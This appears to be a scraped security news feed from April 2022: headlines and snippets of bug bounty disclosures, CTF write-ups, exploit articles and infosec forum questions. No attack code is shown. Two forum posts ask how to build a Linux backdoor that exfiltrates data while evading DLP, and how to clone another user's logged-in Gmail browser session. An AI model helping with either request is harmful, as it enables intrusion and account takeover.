    curl disclosed a bug submitted by nyymi: https://hackerone.com/reports/1548535
  • Open

    Shared folder accessed by unauthorized third party?
    Windows 10 Shared external hard drive on my network was making continuous noises as if it were reading/writing large amounts of data. The noises would stop the second I moved my mouse and starting using my machine. This happened on at least 2 occasions. I was pretty suspicious of this, and went and realized I had forgotten to make the hard drive unshared. I had previously shared it so I could back up files from my laptop before formatting. When I attempted to make the drive unshared, and it said a user was connected to it, and if I was sure I wanted to make it unshared if a user was connected. This spooked me quite a bit. My main questions: Is it possible it was talking about my laptop? Are there legitimate Windows 10 processes that can cause a hard drive to make read/write noises when the computer is not in use? submitted by /u/Exact_Frosting_1197 [link] [comments]
    Clone gmail logged in google chrome browser to another laptop
    Is there anyway to clone gmail logged in google chrome browser to another laptop ? ​ Ex: User A is logged in to gmail on google chrome using Laptop1 User B wants to clone User A's chrome with his gmail logging Laptop2 ​ Please suggest any way? ​ Note: User B have all the access to User A's Laptop1 submitted by /u/hasitha1989 [link] [comments]
  • Open

    Process Herpaderping (Mitre:T1055)
    Introduction Johnny Shaw demonstrated a defense evasion technique known as process herpaderping in which an attacker is able to inject malicious code into the mapped The post Process Herpaderping (Mitre:T1055) appeared first on Hacking Articles.
  • Open

    Process Herpaderping (Mitre:T1055)
    Introduction Johnny Shaw demonstrated a defense evasion technique known as process herpaderping in which an attacker is able to inject malicious code into the mapped The post Process Herpaderping (Mitre:T1055) appeared first on Hacking Articles.
  • Open

    War in Ukraine / April 23
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    10 пошукових систем, про які ви не чули
    Маловідомі пошукові системи для OSINTерів і журналістів: знаходять те, що не може Google. Огляд 10-ти кращих анонімних пошуковиків. Continue reading on KR. LABORATORIES IT BLOG »
    Midnight Flag CTF 2022 — OSINT Write-up
    Dans la nuit du 23 au 24 avril 2022, s’est déroulé le CTF Midnight Flag “Infektion” organisé par les étudiants de l’ESNA (page d’accueil… Continue reading on Medium »
    QUALI PERCORSI INTERDISCIPLINARI PER UNA TEORIA GENERALE DI OSINT?
    Da quasi un ventennio ormai sostengo che l’OSINT — intesa come disciplina — meriti un costrutto teoretico robusto, affidabile, ben… Continue reading on Medium »
    SPY NEWS: 2022 — Week 16
    Summary of the espionage-related news stories for the Week 16 (17–23 April) of 2022. Continue reading on Medium »
  • Open

    EvtxHussar 1.0
    Hi, I recently written tool in Golang which will help me in my forensics work by dumping most common Event ID's from various Windows Event logs (Powershell, Security, System etc.). Event's are highly configurable as they are placed in external YAML files. It differentiate logs by Computer field of last event in .evtx file, so extra logs from VSS, Archive and backups can be included easily. Project is based on evtx library used in Velociraptor. Link to tool: https://github.com/yarox24/EvtxHussar ​ Current categories support: PowerShell (including ScriptBlock reconstruction) Account related modifications Audit log cleared Process creation (including Sysmon) Scheduled Tasks (including extra parsing of XML Content if present) - Creation/Modification and Execution Services ​ In future I plan to add YAML definitions for: Logon events (Yes, this one is important) RDP events WinRM events and others ​ Output formats: - Excel (Default) - CSV - JSON - JSONL ​ Maybe it will be useful for some of you submitted by /u/Yarox45 [link] [comments]
    svchost.exe without '-k' is this a malware ?
    Hello, I did some log investigations in Azure Sentinel and found this process.In a youtube video I saw that this is something suspicious an svchost.exe process without '-k'.How can I investigate this without access to the VM ? Folder path is C:\Windows\System32 Things on cloud are different from on-premise in my opinion . Thanks. submitted by /u/Agent_B99 [link] [comments]
    Crawl through directories when exporting to CSV in autopsy
    So, I'm examining a system that has several folders within folders whose files I would like to export to CSV. Rather than exporting the items in each folder individually, is there a way to crawl through directories to export the info of all files contained in each folder? submitted by /u/roku77 [link] [comments]
    Any options for Samsung T7 touch SSD?
    I have an encrypted Samsung T7 touch external hard drive to process. I have access to most forensic tools. What would be the best option or is it hopeless. (AES 256)? submitted by /u/james1234cb [link] [comments]
  • Open

    SecWiki News 2022-04-24 Review
    2021 年 0day 漏洞利用分析 by ourren 企业安全之浅谈红蓝对抗--下 by ourren 企业安全之浅谈红蓝对抗--上 by ourren 《VirusTotal 2021 年度恶意软件趋势报告》 by Avenger 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-04-24 Review
    2021 年 0day 漏洞利用分析 by ourren 企业安全之浅谈红蓝对抗--下 by ourren 企业安全之浅谈红蓝对抗--上 by ourren 《VirusTotal 2021 年度恶意软件趋势报告》 by Avenger 更多最新文章,请访问SecWiki
  • Open

    AppSec tales III — Password Recovery
    Application Security Testing of the Password Recovery form guidelines. Continue reading on Medium »
    Redis Exploit Tool
    This tool is for personal safety research study only. Continue reading on Medium »
    Mobile Security Framework (MobSF) Setup — Kali Linux and Windows
    Hello Everyone.. I will explain installation steps of MobSF framework in Kali Linux and Windows OS in this blog. Continue reading on Medium »
  • Open

    “精”准把握静态分析|科恩二进制文件自动化静态漏洞检测工具正式开源
    作者:腾讯科恩实验室 原文链接:https://mp.weixin.qq.com/s/x6jNNvkWRJt1YcHMakWHEg 引言 为提升静态分析在二进制文件漏洞检测领域效率和可扩展性,科恩孵化并开源二进制文件静态漏洞分析工具BinAbsInspector项目。 代码仓库地址:https://github.com/KeenSecurityLab/BinAbsInspector 背景 软...
    The More You Know, The More You Know You Don’t Know——回顾 2021 年在野利用的 0day 漏洞
    作者:Maddie Stone@Google Project Zero 译者:知道创宇404实验室翻译组 原文链接:https://googleprojectzero.blogspot.com/2022/04/the-more-you-know-more-you-know-you.html 这是我们回顾在野利用 0day 漏洞的第三个年度 [2020 年,2019 年]。每年我们都会回顾...
  • Open

    “精”准把握静态分析|科恩二进制文件自动化静态漏洞检测工具正式开源
    作者:腾讯科恩实验室 原文链接:https://mp.weixin.qq.com/s/x6jNNvkWRJt1YcHMakWHEg 引言 为提升静态分析在二进制文件漏洞检测领域效率和可扩展性,科恩孵化并开源二进制文件静态漏洞分析工具BinAbsInspector项目。 代码仓库地址:https://github.com/KeenSecurityLab/BinAbsInspector 背景 软...
    The More You Know, The More You Know You Don’t Know——回顾 2021 年在野利用的 0day 漏洞
    作者:Maddie Stone@Google Project Zero 译者:知道创宇404实验室翻译组 原文链接:https://googleprojectzero.blogspot.com/2022/04/the-more-you-know-more-you-know-you.html 这是我们回顾在野利用 0day 漏洞的第三个年度 [2020 年,2019 年]。每年我们都会回顾...
  • Open

    Pwn2Own 2022迈阿密大赛落幕 去年春季赛冠军蝉联Master of Pwn
    蝉联2021和2022冠军
    FreeBuf早报 | Conti声称对哥斯达黎加的袭击负责;Wawa起诉万事达卡
    QNAP固件更新修复其 NAS 中的 Apache HTTP 漏洞.
    相约「零信任安全论坛」 5月19日云上共话安全
    随着网络威胁更加多元化,传统安全边界已经无法满足企业远程办公的安防需求。
    Lapsus$黑客组织入侵了T-Mobile内部系统
    T-Mobile证实Lapsus$勒索团伙于“几周前”使用被盗凭据入侵了其网络系统,并获得了对内部系统的访问权限。
    挖矿病毒“盯上”了 Docker 服务器
    Lemon_Duck 僵尸网络运营商正进行Monero加密挖矿活动,Docker API 成为其主要攻击目标。
    美国政府向六所大学拨款1200万美元,研发网络攻防工具
    美国能源部(DOE)宣布,将向六所大学团队提供1200万美元资金,用于开发网络攻防工具,以保护美国能源输送系统免受网络攻击。
    美国宣布爬虫合法,万亿级爬虫大军暗流涌动
    互联网竞争日趋白热化的当下,针对线上资产的竞争必将愈演愈烈,爬虫攻击已成为企业线上资产的首要威胁。
    如何为数据库选择最佳加密方法
    加密是保持数据安全的通用过程。在这篇文章中,我们探索了不同的加密方法,以便您可以将信息安全地存储在数据库中。
  • Open

    Profiling a Personal Portfolio of Personal Photos and Security Event Conference Photos - A Compilation
    Folks,Who's on Facebook? Feel free to send me an invitation request and let's catch up. The following photos are a personal Facebook photos compilation which you can feel free to go through in terms of catching up in terms of what I've been up to.Who's on Facebook? Feel free to send me an invitation and let's catch up. The following photos are a personal Facebook photos compilation which you can
  • Open

    FREE ICS related CTF prested by CISA
    submitted by /u/1winway [link] [comments]
  • Open

    Atlassian fixes critical Jira authentication bypass vulnerability
    Article URL: https://nvd.nist.gov/vuln/detail/CVE-2022-0540 Comments URL: https://news.ycombinator.com/item?id=31140284 Points: 2 # Comments: 0

  • Open

    Super easy manipulation Led to full NFT control
    First of all, i’ll not disclose any information about this Web3 project; I’ll just give an example of what has already been done . Continue reading on NetworkingSec »
    Super easy manipulation Led to full NFT control
    First of all, i’ll not disclose any information about this Web3 project; I’ll just give an example of what has already been done . Continue reading on Medium »
    Beginner’s Guide of Bug Bounty By Arth Bajpai
    Hello Everyone I was thinking about writing something, So I thought why not on the most asked question which is how to start in bug… Continue reading on Medium »
    How I Got Swag From Race Condition
    Hello All, Hope you are having a great time! I am Moin Khokhar Aka Silentknight.bug This Is My First Time Please Forgive Me if Any Grammar… Continue reading on Medium »
    COMO TIVE ACESSO AS INFORMAÇÕES DO BANCO DE DADOS DE UMA GRANDE UNIVERSIDADE.
    VULNERABILIDADE WORDPRESS. Continue reading on Medium »
    How I got Apple Hall Of Fame !
    Continue reading on Medium »
    Walkthrough of “Insecure Deserialization”- PentesterAcademy
    Hello all, This Blog will provide a walkthrough of “Insecure Deserialization Lab” by PentesterAcademy. Continue reading on Medium »
  • Open

    Bluetooth vulnerability in smart Covid test patched, the second to do so
    Article URL: https://www.scmagazine.com/analysis/device-security/bluetooth-vulnerability-in-smart-covid-test-patched-the-second-to-do-so Comments URL: https://news.ycombinator.com/item?id=31136445 Points: 3 # Comments: 0
    Psychic Signatures (Java Vulnerability)
    Article URL: https://www.youtube.com/watch?v=502iGDxuiRk Comments URL: https://news.ycombinator.com/item?id=31130598 Points: 1 # Comments: 0
  • Open

    Renderers can obtain access to random bluetooth device without permission
    Internet Bug Bounty disclosed a bug submitted by palmeral: https://hackerone.com/reports/1519099 - Bounty: $480
    Attacker can bypass authentication build on ingress external auth (`nginx.ingress.kubernetes.io/auth-url`)
    Kubernetes disclosed a bug submitted by thisbug: https://hackerone.com/reports/1357948 - Bounty: $500
  • Open

    Writing a zero findings pentest report
    submitted by /u/DiabloHorn [link] [comments]
    Are vulnerability scores misleading you? Understanding CVSS severity and using them effectively
    submitted by /u/MiguelHzBz [link] [comments]
    Cliam: better cloud agnostic IAM permissions enumerator. Covers AWS and GCP, but more to come!
    submitted by /u/securisec [link] [comments]
  • Open

    Email OSINT
    Today I will talk about sources designed to identify the identities of the owners of email addresses in the framework of OSINT research… Continue reading on Medium »
    War in Ukraine / April 22
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Сервіси для перевірки та моніторингу веб-сайтів і серверів
    Підбірка онлайн-сервісів для перевірки, моніторингу та обслуговування хостів — сайтів, доменів, серверів. Моніторинг електронних ресурсів. Continue reading on KR. LABORATORIES IT BLOG »
    IA fagociterà OSINT?
    In ottica previsionale… una domanda più che legittima. Continue reading on Medium »
    What is there for automated detection of deepfakes?
    Fake Profile Detector (Deepfake, GAN) — this AI model only works on StyleGAN images used to create fake human faces of people that don’t… Continue reading on Medium »
  • Open

    SecWiki News 2022-04-23 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-04-23 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    问题频频,盘点近期特斯拉所经历的“网安事故”
    近来,围绕特斯拉数据处理相关的争议乃至系统被破解、泄密的事件时有发生。本文立足于国内和国外两部分,盘点特斯拉所遭遇的“网安事故”。
  • Open

    Offensive con 2022 Talks
    submitted by /u/dmchell [link] [comments]
  • Open

    What else can I be doing to bolster my resume and increase my chances of breaking into the field after I graduate?
    Hello, I am 75% completed with my Bachelors in Cybersecurity and I am trying to do everything I possibly can to break into the field when I graduate. I have lurked the cybersecurity subreddits heavily and have picked up a lot of the general advice. I have obtained my A+, Net+, and Sec+. I have started a homelab and have been doing various exercises within it to get my hands on as many different programs/tools/operating systems/etc as I can. I am learning Python and have made a Github account where I have posted a few basic scripts I have made and will continue to post more as I keep practicing. I have participated in numerous CTFs both small and on the national scale and have placed well in some of them and added them to my LinkedIn. I have started a blog and have been posting just general writeups and blog posts of CTFs or whatever I'm doing within Cybersec at the time. I am working through TryHackMe and have been able to manage a few boxes on HackTheBox. I am sending out resumes to try and find an internship, but I don't seem to be having luck in other states and the state I am in is atrocious for jobs. I plan on leaving forever once I graduate. What else can I be doing to make my resume look good? I'm much more talented at the Blue team side (Packet/Log Analysis, Steg, etc) when I do CTFs, but have a greater interest in red team. I have been eyeing both the Security Blue Team Level 1 and TCM Security's new PNPT cert. They are both relatively cheap and seem like extremely good knowledge that would help me in an interview. submitted by /u/BTBricktop [link] [comments]
    Network still trying to connect to kaspersky labs even though uninstalled
    Edit: I solved this (credits to Sophos UTM Forum by Jay Jay. It's from my sophos firewall. I added kaspersky in my network definition. My router is trying to resolve the domain, while my pihole is blocking it. I removed the network definition entry and the queries stopped. Thanks for all those who helped. Hello, this my be the better subreddit to ask this. I uninstall Kaspersky few months ago from 2 of my computer (PC and surface pro) for obvious reasons. I used revo uninstaller pro so it also scans the registry and delete some remnants of it. I still notice in my pihole logs that it keeps trying to connect to it (I blocked it). It is my top blocked domain. How can I trace whatever it is trying to connect to kaspersky labs on my PC and remove it? Thanks. Edit: I have powered off my PC (switch off from power supply), unplugged my ethernet cable, force shutdown my surface pro using cmd /s /f /t 0 option and put it outside wifi range in my car, I still get queries every minute. I’ll try wireshark to see where the request is coming from and update. submitted by /u/eijisawakita [link] [comments]

  • Open

    Starting a Career
    I passed my OSCP a few months ago. Is that really enough to begin a career? I understand it's literally the floor for expectations (being able to use google, and a general idea of report writing) but it really doesn't feel like it. It sounds insane but I haven't even applied yet for a job because of the absolutely astounding work I've seen online by fellow info sec enthusiasts. It's a high bar of expectation that I doubt I'd be able to fulfill, even if the "actual" job's probably more akin to sending out emails about password policies submitted by /u/smol-dumb-and-gay [link] [comments]
    I'm Looking for a Honeypot for Threat Intel
    Thinking about renting a VPS for Threat Intel and possibly IOC's. No Web, just SSH and maybe with up to date Vuln Library Whats your goto Honeypot? submitted by /u/No_Bumblebee_5793 [link] [comments]
    How to purge emails from Cloud Exchange (E3 license, E5 security)
    Hi All, Recently ran into an issue where someone sent an internal email with information they shouldn't have. Typically, to purge these emails I would use KnowBe4 or Office365's security and compliance: eDisovery. We've used both methods but this way a way larger scale and there are still emails floating around. Some people responded to it or forwarded it. Let's pretend the title was "ABC". We have three subjects then:"ABC""RE: ABC""FW: ABC" We've searched these subjects in eDiscovery and purged the results. It's still not pulling everything as they are still in people's mailboxes. Meaning...those exact subject lines are still being found in user's inboxes. Office365's security and compliance: eDisovery: Search is done through here that gets a collection of emails. We then purge those via powershell. Stuck here as there are plenty still around. Anybody have tools in E5 security they use for this? submitted by /u/compguyguy [link] [comments]
    How is this possible? If your accounts/devices are “taken over” is it possible that you can see the persons browsing history? Also could you see some of their iCloud downloads in your file folder and possibly pics?
    I am seeing business related websites, sale boosting and had a random picture show up when I was adding a new widget. submitted by /u/00miagv00 [link] [comments]
    How do you stay secure?
    Hey, everyone. So I know that there are subs for VPN's, password managers and such. But the information over there is either people arguing that the VPN they use is the best or just shills for NordVPN, Express, etc. So I thought (and hopefully it is okay) if I asked some actual security experts what you do to stay private and secure? If it's allowed, what VPN's or password managers do you use? Or do you use proxies? Or do you not use anything at all? Encrypted email? Any top of the line anti virus software? Or just having the knowledge of not being dumb on the internet? Are all of these privacy clients even worth it? I know that the first and foremost course of action is having some sense when it comes to the internet; i.e. Not clicking on suspicious links, not downloading random files, etc. But I would assume these programs have their pros, right? I am getting into the cyber security world and there is just SO many companies out there so I just thought I would ask some people who actually are in this field. I hope that is okay! ​ Thanks submitted by /u/strings_on_a_hoodie [link] [comments]
    Average lifetime of an IoC
    Hello threat analyst stranger, ​ For you, and based on your experience, what is the average lifetime for an IoC? the goal here is to automate the IoC requalification. When should i requalify my IoCs :) ​ I would say: Hash: 10 days Domain: 1 month IP: 5 month ​ thank you ! submitted by /u/Immediate-Sentence-4 [link] [comments]
    Can an ISP see what browser you’re using and do they see your browsing history or traffic any differently whether you’re using Chrome or Firefox?
    Can an ISP see what browser you’re using and do they see your browsing history or traffic any differently whether you’re using Chrome or Firefox? submitted by /u/Available-Fly7541 [link] [comments]
    About information on security news
    Hello, I'm NewB who is studying security. I'm looking for a blog or page about security, so is there anyone who can share it? I like the latest security news, OSint and search engine, and articles about vulnerabilities that I'm most interested in. I'm writing here because I want to hear a lot of news and information submitted by /u/Alexiosplana [link] [comments]
    Computer Recognition Authentication
    I'm interested in this form of authentication, but can't seem find a heck of a lot about it, can anyone point me in right direction to learn more? submitted by /u/ahpto [link] [comments]
  • Open

    Mainly memes; some OSTs and bass boosted songs (many memes are NSFW)
    https://dl.abstract.land/ submitted by /u/steamsy_ [link] [comments]
  • Open

    GEO-LOCATION WITHOUT STREET VIEW
    This might be coming out late, but hey better be late than never. Continue reading on Osintfun »
    War in Ukraine / April 21
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    COS’È LA I-SFERA
    Idee, valori e contenuti per l’innovazione disciplinare nell’Intelligence delle Fonti Aperte e Originarie Continue reading on Medium »
    Finding Luther — An OSINT Geo location Challenge.
    London was an amazing terrain to do GEOINT. Its intricate small roads in between the buildings made it more complex & beautiful. To my… Continue reading on Medium »
  • Open

    A Detailed Guide on Hydra
    Hello! Pentesters, this article is about a brute-forcing tool Hydra. Hydra is one of the favourite tools of security researchers and consultants. Being an excellent The post A Detailed Guide on Hydra appeared first on Hacking Articles.
  • Open

    A Detailed Guide on Hydra
    Hello! Pentesters, this article is about a brute-forcing tool Hydra. Hydra is one of the favourite tools of security researchers and consultants. Being an excellent The post A Detailed Guide on Hydra appeared first on Hacking Articles.
  • Open

    Any CREST CPIA guidance for help?
    Hello guys, I decide to take CPIA exam however other than the syllabus CREST recommend, I cant find any other extra information. I am really interest in forensic pathway, but it is really less guidance or advice I can refer. :( submitted by /u/NoIdeaForMyFuture [link] [comments]
    M.2 Drive
    Can you create an image of an M.2 drive? Is the process the same as any other HDD or are there any restrictions? submitted by /u/Beep-Boop-Bop-Boop [link] [comments]
    Encase problem in question
    submitted by /u/Metriczcaptian88 [link] [comments]
  • Open

    No Hardware, No Problem: Emulation and Exploitation
    submitted by /u/0xdea [link] [comments]
    The Illustrated QUIC Connection
    submitted by /u/syncsynchalt [link] [comments]
    WSO2 RCE (CVE-2022-29464) exploit and writeup
    submitted by /u/0xdea [link] [comments]
    Hardware Security Talks Announced! Hardwear.io
    submitted by /u/hardweario [link] [comments]
    Abusing Azure Container Registry Tasks from Specter-Ops
    submitted by /u/gdraperi [link] [comments]
    Null ECDSA Signatures - Proof of concept for bypassing JWT signature checks using CVE-2022-21449
    submitted by /u/thorn42 [link] [comments]
    Smashing the Modern Web Tech Stack — Part 1: The Evolving Threat Landscape in 2022 and DOM-based XSS in Cloud-Native React Apps
    submitted by /u/MalwareJoe [link] [comments]
  • Open

    Removing the Stigma of a CVE
    Article URL: https://github.blog/2022-04-22-removing-the-stigma-of-a-cve/ Comments URL: https://news.ycombinator.com/item?id=31123900 Points: 1 # Comments: 0
  • Open

    SecWiki News 2022-04-22 Review
    TheRoadOfSO: 学习安全运营的记录 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-04-22 Review
    TheRoadOfSO: 学习安全运营的记录 by ourren 更多最新文章,请访问SecWiki
  • Open

    CSS Transition 기반의 ontransitionend XSS
    @garethheyes가 또 새로운 XSS 벡터를 만들어 왔습니다. 바로 ontransitionend 란 이벤트 핸들러인데요. 이 이벤트 핸들러는 transition, 즉 CSS의 애니메이션이 끝날 때 동작하며 동작을 위해선 해당 Element에 포커스 상태가 되어야합니다. 1 2 3 4 5 display: block; transition: outline 1s; test 위 코드 기반이고, 약간 더 살펴보죠. CSS Transition Transition은 CSS에서 속성이 변경될 때 애니메이션 속도를 명시하는 값입니다. 아래와 같이 값으로 동작할 CSS 속성과, 시간 값이 들어가게 됩니다.
    Metasploit 데이터를 Httpx로?
    오랜만에 Metasploit 관련 글을 쓰는 것 같습니다. 다름이 아니라 netpen이라는 plugin을 하나 찾았는데, 이를 이용하면 Metasploit으로 수집한 정보를 가지고 nuclei나 zap/burp 등 다른 도구와 파이프 라인으로 구성해서 사용하기 좋아보였습니다. Netpen 공식 플러그인은 아니고 wdahlenburg가 만들어둔 플러그인 스크립트로 metasploit에서 수집된 정보를 host:port 형태로 콤보 리스트를 만들어줍니다. 간단한 작업이지만 막상 metasploit으로 수집하고 이를 다시 파싱하려면 약간 귀찮은데요. 이 플러그인은 이러한 점을 딱 해결해줍니다. https://github.com/wdahlenburg/MSF-Plugins/blob/main/netpen.rb Add plugin repo에서 코드를 받아서 metasploit의 plugin 디렉토리에 넣어줍니다.
  • Open

    34 year old starting in Exploit Development, got a chance ?
    Hello there. I've done some some pentesting work and jobs, but i've have a passion to get into the exploit development and cracking field and lookind forward to get a real life job However i am 34 year old, do i still a chance or i will be wasting time ? submitted by /u/morizk90 [link] [comments]
  • Open

    How I Bypass 2FA while Resetting Password
    It was a private program on “Hackerone” , I had set target in my mind that I have to bypass 2fa, so I checked every method to bypass “Two… Continue reading on InfoSec Write-ups »
    Pythonic Malware Part-2: Reversing Python Executables
    In Pythonic Malware Part-1, I demonstrated how Python executables can be used to bypass Windows Defender and successfully launch… Continue reading on InfoSec Write-ups »
    A Facebook Bug that Disclosed Unused Custom Thumbnails of Any Facebook Page’s Public Videos
    No content preview
  • Open

    How I Bypass 2FA while Resetting Password
    It was a private program on “Hackerone” , I had set target in my mind that I have to bypass 2fa, so I checked every method to bypass “Two… Continue reading on InfoSec Write-ups »
    Pythonic Malware Part-2: Reversing Python Executables
    In Pythonic Malware Part-1, I demonstrated how Python executables can be used to bypass Windows Defender and successfully launch… Continue reading on InfoSec Write-ups »
    A Facebook Bug that Disclosed Unused Custom Thumbnails of Any Facebook Page’s Public Videos
    No content preview
  • Open

    How I Bypass 2FA while Resetting Password
    It was a private program on “Hackerone” , I had set target in my mind that I have to bypass 2fa, so I checked every method to bypass “Two… Continue reading on InfoSec Write-ups »
    Pythonic Malware Part-2: Reversing Python Executables
    In Pythonic Malware Part-1, I demonstrated how Python executables can be used to bypass Windows Defender and successfully launch… Continue reading on InfoSec Write-ups »
    A Facebook Bug that Disclosed Unused Custom Thumbnails of Any Facebook Page’s Public Videos
    No content preview
  • Open

    1-click RCE in Electron Applications
    How simple link opening leads to RCE Continue reading on Medium »
    Userland City — HackTheBox — Challenge — Web Exploitation — Writeup
    Hello guys I am back to posting another writeup. So let’s start talking instead of wasting our time lol. Continue reading on Medium »
    Neonify — HackTheBox — Challenge — Writeup — Web Exploitation
    Hello guys I am back to another writeup. So today we are talking about Neonify Web challenge. So let’s start talking about it. Continue reading on Medium »
    Nginxatsu — HackTheBox — Challenge — Writeup — Web Exploitation
    Hello guys we are back to posting another writeup about Web Exploitation challenge on HackTheBox. So let’s start talking about it. Continue reading on Medium »
    Pythonic Malware Part-2: Reversing Python Executables
    In Pythonic Malware Part-1, I demonstrated how Python executables can be used to bypass Windows Defender and successfully launch… Continue reading on InfoSec Write-ups »
    Aave V3’s Price Oracle Manipulation Vulnerability
    On April 7th, after Aave V3 had launched for 3 weeks, we discovered an issue on Aave V3’s price oracle. To be more specifically, the… Continue reading on Medium »
  • Open

    FBI:BlackCat 勒索软件至少入侵了全球 60 个实体
    2021年11月至2022年3月期间,BlackCat勒索软件团伙,至少入侵了全球 60 个组织的网络系统。
    五眼联盟发布咨询,警惕俄罗斯网络攻击
    五眼联盟的网络安全机构发布联合咨询,警惕具有俄罗斯背景的攻击者对关键基础设施发动网络攻击。
    FreeBuf甲方群话题讨论 | 聊聊企业HW行动
    随着今年HW行动将至,会有哪些新的攻防趋势?攻防前可以有哪些自查方案?攻防期间有碰到过哪些奇葩事件?
    ALAC音频格式存漏洞,全球超半数 Android 用户隐私受威胁
    研究人员在去年发现了 ALAC 格式的漏洞,这些漏洞可能导致攻击者远程访问目标设备中的媒体和音频对话。
    Android中的严重bug可导致用户媒体文件被访问
    安全分析师发现,由于Apple无损音频编解码器(ALAC)的实施存在缺陷。
    FreeBuf周报 | 官方曝光美国网络攻击武器“蜂巢”;联想三个漏洞影响数百万台电脑
    那个曾经看似风平浪静的互联网,底下正暗流涌动,当我们还在享受互联网带来的服务时,无数的后门和木马早已悄悄嵌入其中。
    讲师招募中 | FreeBuf精品公开课需要发光发热的你~
    你是否有“一身绝技”无处施展?又或是空有“有趣的灵魂”,却鲜为人知?别着急!FreeBuf精品公开课拍了拍“你”,并递上一份邀请函~一起来看看吧!
    小心,LinkedIn的求职简历被“坏蛋”盯上了
    名为“more_eggs”的恶意软件正潜藏在简历中,对目标公司相关账户进行窃取。
  • Open

    Aave V3's Price Oracle Manipulation Vulnerability
    Article URL: https://medium.com/@hacxyk/aave-v3s-price-oracle-manipulation-vulnerability-168e44e9e374 Comments URL: https://news.ycombinator.com/item?id=31117915 Points: 2 # Comments: 0
  • Open

    If you have a WordPress site and have clients that require service from your company. Please disable the admin login. This is just a lab machine but as a blueteamer I see to much of this in the wild. I'm not releasing a email if your secure message site is not secure.
    submitted by /u/newworldsamurai3030 [link] [comments]
  • Open

    Bypass of fix #1370749
    Shopify disclosed a bug submitted by encryptsaan123: https://hackerone.com/reports/1489077 - Bounty: $900

  • Open

    After changing the storefront password, the preview link is still valid
    Shopify disclosed a bug submitted by tomorrow_future: https://hackerone.com/reports/1370749 - Bounty: $900
    Open redirect by the parameter redirectUri in the URL
    BlackRock disclosed a bug submitted by mrccrqr: https://hackerone.com/reports/1250758
    [h1-2102] [Plus] User with Store Management Permission can Make changeDomainEnforcementState - that should be limited to User Management Only
    Shopify disclosed a bug submitted by ngalog: https://hackerone.com/reports/1084892 - Bounty: $1900
    [h1-2102] [Plus] User with Store Management Permission can Make convertUsersFromSaml/convertUsersToSaml - that should be limited to User Management
    Shopify disclosed a bug submitted by ngalog: https://hackerone.com/reports/1084904 - Bounty: $1900
    [h1-2102] [PLUS] User with Store Management Permission can Make enforceSamlOrganizationDomains call - that should be limited to User Management Only
    Shopify disclosed a bug submitted by ngalog: https://hackerone.com/reports/1084939 - Bounty: $1900
    User with no Develop apps permission can Uninstall Custom App
    Shopify disclosed a bug submitted by ayyoub: https://hackerone.com/reports/1466855 - Bounty: $600
    [h1-2102] Improper Access Control at https://shopify.plus/[id]/users/api in operation UpdateOrganizationUserRole
    Shopify disclosed a bug submitted by ramsexy: https://hackerone.com/reports/1084638 - Bounty: $950
    Same the Url
    Shopify disclosed a bug submitted by 4bel: https://hackerone.com/reports/1459338 - Bounty: $500
    curl proceeds with unsafe connections when -K file can't be read
    curl disclosed a bug submitted by medianmedianstride: https://hackerone.com/reports/1542881
    Timing difference exposes existence of accounts
    Zivver disclosed a bug submitted by martinvw: https://hackerone.com/reports/1391636
  • Open

    Smashing the Modern Web Tech Stack — Part 1: The Evolving Threat Landscape in 2022 and DOM-based…
    This is the first post in a series called ‘Smashing the Modern Web Tech Stack.’ Modern Web Applications today are more complex than ever… Continue reading on Medium »
    Testnet Bug Bounty Winners List & Swappi Early Adopters Raffle
    Dear Swappicados: the winner list has final come! Continue reading on Medium »
    Open Redirect: Just a redirection?
    Greetings, everyone! i’m back with a new article after a long absence. In this writeup, i will attempt to explain everything i know about… Continue reading on Pentester Nepal »
    Vulnerability Research List
    Vulnerability Research OA/Middleware/Framework (Index). Open source products, foreign application software Continue reading on Medium »
    Open Redirection into Bentley System
    Hello, Hackers Welcome to another write-up where I have shared a scenario of Open Redirection… Continue reading on Medium »
    Weather App — HackTheBox — Challenge — Writeup — Web Exploitation
    Hello guys I am back to posting another writeup. It’s about Web again and yeah let’s start talking ;) Continue reading on Medium »
    Under Construction — HackTheBox — Challenge — Writeup — Web Exploitation
    Hello guys I am back to posting another writeup. So let’s start talking. So we can login to the page. I tried admin:admin and it didn’t… Continue reading on Medium »
    Toxic — HackTheBox — Challenge — Writeup — Web Exploitation
    Hello guys I am back. You may know me. My name is rootjkqsta. So today I was on HackTheBox pwning machines and challenges. So I saw this… Continue reading on Medium »
    LoveTok — HackTheBox — Challenge — Writeup — Web Exploitation
    Hello we are back to another writeup. Now we are talking about LoveTok It’s about Web Exploitation by the way! So let’s start talking. Continue reading on Medium »
    Breaking Grad — HackTheBox — Challenge — Writeup — Web Exploitation
    Hello ladies and gentlemen. I am back to posting a new writeup. Now we are talking about Breaking Grad Web Exploitation challenge. So… Continue reading on Medium »
  • Open

    malware analysis project
    hello guys, I'm trying to build a Linux user space backdoor with data exfiltration capabilities but I'm thinking about the data loss prevention softwares ,dlp (endpoint protection). my question is ,how to overcome this protection? and if someone has resources about a topic similar to mine can you help? submitted by /u/Mind-Thief1122 [link] [comments]
    how to secure port 135
    I understand the importance of having RPC service enabled for windows to function properly, but it poses a lot of risk in the online world. what is the general best practice to keep this port secured? submitted by /u/Playful-Net9746 [link] [comments]
    How many IRemoteWinSpool RDP binds are "normal" when not printing?
    I've been noticing IRemotewinspool rdp binds from some of our PCs. It got my attention because of PrintNightmare and the fact that none of us have been printing anything. I'm trying to find more information about this online but I can't find anything about "normal" IRemoteWinsPool amongst all the PrintNightmare stuff. Should the service be used without anybody printing? Thank you submitted by /u/techsupportwantedpls [link] [comments]
    Any good tools for finding sequential keys in a batch of requests?
    Hello, I'm looking for a tool to search through the responses from a batch of http requests and find values that might be sequential keys, bonus points if it can replay the requests and verify the value is in fact a sequential key. thanks submitted by /u/quickmodel_ai [link] [comments]
    Linux question for an application 'bug' I'm trying to tease out
